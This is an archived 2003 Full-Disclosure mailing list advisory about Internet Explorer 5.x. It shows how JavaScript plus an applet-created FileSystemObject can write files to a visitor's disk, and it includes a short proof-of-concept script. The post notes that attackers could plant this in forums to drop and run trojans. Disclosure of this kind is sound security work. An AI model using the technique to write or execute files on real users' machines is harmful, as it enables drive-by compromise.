[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Internet Explorer JavaScript insecure function

To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] Internet Explorer JavaScript insecure function
From: "FREEBRAIN" <freebrain@softhome.net>
Date: Sun, 7 Dec 2003 15:14:42 +0100

* Internet Explorer JavaScript insecure function *


Product: Microsoft Internet Explorer
Version: 5.x (probabily other versions may be affected)


***


Problem:

I discovered a javascript function (interpreted by Internet Explorer) called 
"file.writeline()" may be 
potentially dangerous for Internet Explorer users. This function allows to 
write files  by means of 
JavaScript on a hard disk.

An attacker may use this function writting JavaScript code in posts of forums, 
guestbooks, etc  for owning 
his victim's computers. With "file.writeline()" function the attacker can write 
trojans/virus/etc on his 
victim's hard disks, for example, an attacker may use JavaScript 
"file.writeline()" function for writting 
a malicious file in VBS (Visual Basic Scripting) language. 

I repeat, this may be potentially dangerous for Internet Explorer users.

NOTE: Actually a virus in the wild that affects to mIRC users is using this 
function ("file.writeline").

NOTE2: As you can see on the "Proof of concept", other functions are needed to 
carry out an "intrusion".


***


Proof of concept:

InterfaceObject=document.applets[0];
setTimeout("Write()",1000);
function Write() {
fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
InterfaceObject.setCLSID(fsoClassID);
fso = InterfaceObject.createInstance();
// windir = fso.getspecialfolder ;        
filename = "\\proof.txt";
var filecontent = "Hello world";
file = fso.opentextfile(filename, "2", "TRUE");
file.writeline(filecontent)
file.close();

}

This code writes a file called "proof.txt" in the hard disk, with the content 
"Hello world". Also you can
execute files you write by means of JavaScript adding "Run();" to the function.


***


Solution:

I'm not sure about the solution but I recommend to upgrade to the last version 
of Internet Explorer.
Also I recommend webmasters to forbid HTML codes that content this function in 
their forums, guestbooks, etc.


***


Thanks to: 

#disidents,#hackers @ irc-phoenix.org

#disidents,#sleepx,#ayuda_internet @ irc-hispano.org

Special thanks go to: Impos

(sorry my poor english)


***


By FREEBRAIN

FREEBRAIN is a member of DisidentS Hacker Team

http://disidents-team.cjb.net (under construction) - 
http://www.gratisweb.com/disidents

<freebrain@wanadoo.es>

Follow-Ups:
- Re: [Full-Disclosure] Internet Explorer JavaScript insecure function
  - From: Jelmer <jkuperus@planet.nl>

Prev by Date: Re: [Full-Disclosure] Partial Solution to SUID Problems
Next by Date: Re: [Full-Disclosure] Partial Solution to SUID Problems
Previous by thread: [Full-Disclosure] CLOSED: RING Fingerprinting
Next by thread: Re: [Full-Disclosure] Internet Explorer JavaScript insecure function
Index(es):
- Date
- Thread